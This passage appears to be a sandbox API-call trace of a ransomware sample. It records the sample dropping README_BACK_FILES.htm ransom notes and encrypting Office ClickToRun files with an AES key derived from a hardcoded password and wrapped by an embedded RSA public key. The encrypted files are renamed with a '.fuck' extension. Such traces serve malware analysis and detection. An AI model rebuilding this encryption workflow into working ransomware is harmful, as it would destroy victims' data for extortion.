"c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.925] GetLastError () returned 0x5 [0238.925] GetLastError () returned 0x5 [0238.926] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0238.926] FindClose (in: hFindFile=0x28467e0 | out: hFindFile=0x28467e0) returned 1 [0238.926] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm")) returned 0xffffffff [0238.926] AreFileApisANSI () returned 1 [0238.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2893318, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 131 [0238.926] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.927] GetLastError () returned 0x5 [0238.927] GetLastError () returned 0x5 [0238.927] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0238.927] FindClose (in: hFindFile=0x282dfb8 | out: hFindFile=0x282dfb8) returned 1 [0238.927] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.927] AreFileApisANSI () returned 1 [0238.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e2370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0238.927] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.928] GetLastError () returned 0x5 [0238.928] GetLastError () returned 0x5 [0238.928] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.928] FindClose (in: hFindFile=0x282deb8 | out: hFindFile=0x282deb8) returned 1 [0238.928] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\readme_back_files.htm")) returned 0xffffffff [0238.928] AreFileApisANSI () returned 1 [0238.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e2098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0238.928] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.929] GetLastError () returned 0x5 [0238.929] GetLastError () returned 0x5 [0238.929] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.929] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2893fb0 [0238.929] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.929] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.929] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2893e30 [0238.929] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.930] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0238.930] FindClose (in: hFindFile=0x2893e30 | out: hFindFile=0x2893e30) returned 1 [0238.930] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\readme_back_files.htm")) returned 0xffffffff [0238.930] AreFileApisANSI () returned 1 [0238.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0238.930] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.930] GetLastError () returned 0x5 [0238.931] GetLastError () returned 0x5 [0238.931] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.931] FindClose (in: hFindFile=0x2893fb0 | out: hFindFile=0x2893fb0) returned 1 [0238.931] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\readme_back_files.htm")) returned 0xffffffff [0238.931] AreFileApisANSI () returned 1 [0238.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e26b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0238.931] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.932] GetLastError () returned 0x5 [0238.932] GetLastError () returned 0x5 [0238.932] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.932] FindClose (in: hFindFile=0x282e3f8 | out: hFindFile=0x282e3f8) returned 1 [0238.932] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\readme_back_files.htm")) returned 0xffffffff [0238.932] AreFileApisANSI () returned 1 [0238.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0238.932] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.933] GetLastError () returned 0x5 [0238.933] GetLastError () returned 0x5 [0238.933] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.933] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2893fb0 [0238.933] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.933] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.933] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28940f0 [0238.934] FindNextFileA (in: hFindFile=0x28940f0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.934] FindNextFileA (in: hFindFile=0x28940f0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.934] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2894130 [0238.935] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.935] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.935] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.935] GetLastError () returned 0x5 [0238.935] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0238.935] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0238.936] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.936] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.936] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.937] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0238.939] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.939] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.939] CryptHashData (hHash=0x2893eb0, pbData=0x28850c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.939] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893eb0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2894030) returned 1 [0238.940] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.940] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.940] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28823f8) returned 1 [0238.940] CryptImportPublicKeyInfo (in: hCryptProv=0x28823f8, dwCertEncodingType=0x1, pInfo=0x2895d80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895db0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895db8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2894070) returned 1 [0238.940] CryptEncrypt (in: hKey=0x2894070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.940] CryptEncrypt (in: hKey=0x2894070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881ea8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2881ea8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881ea8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.941] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.941] CryptEncrypt (in: hKey=0x2894030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.941] CloseHandle (hObject=0xffffffff) returned 1 [0238.941] CloseHandle (hObject=0xffffffff) returned 1 [0238.941] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0238.941] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0238.942] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0238.942] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0238.943] CryptDestroyHash (hHash=0x2893eb0) returned 1 [0238.943] CryptDestroyKey (hKey=0x2894030) returned 1 [0238.943] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.943] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.943] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.943] GetLastError () returned 0x5 [0238.943] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash")) returned 0x20 [0238.943] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0238.944] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.944] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.945] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.945] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2882508) returned 1 [0238.948] CryptCreateHash (in: hProv=0x2882508, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.948] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.948] CryptHashData (hHash=0x2893b70, pbData=0x2885048, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.948] CryptDeriveKey (in: hProv=0x2882508, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28941b0) returned 1 [0238.948] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.948] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.948] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28827b0) returned 1 [0238.949] CryptImportPublicKeyInfo (in: hCryptProv=0x28827b0, dwCertEncodingType=0x1, pInfo=0x2896cf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896d20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896d28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2894030) returned 1 [0238.949] CryptEncrypt (in: hKey=0x2894030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.949] CryptEncrypt (in: hKey=0x2894030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881d98*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2881d98*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.949] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881d98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.949] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.949] CryptEncrypt (in: hKey=0x28941b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.950] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.950] CloseHandle (hObject=0xffffffff) returned 1 [0238.950] CloseHandle (hObject=0xffffffff) returned 1 [0238.950] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0238.950] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0238.951] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg")) returned 0 [0238.951] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.fuck")) returned 0 [0238.952] CryptDestroyHash (hHash=0x2893b70) returned 1 [0238.952] CryptDestroyKey (hKey=0x28941b0) returned 1 [0238.952] CryptReleaseContext (hProv=0x2882508, dwFlags=0x0) returned 1 [0238.952] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.952] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.952] GetLastError () returned 0x5 [0238.952] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: 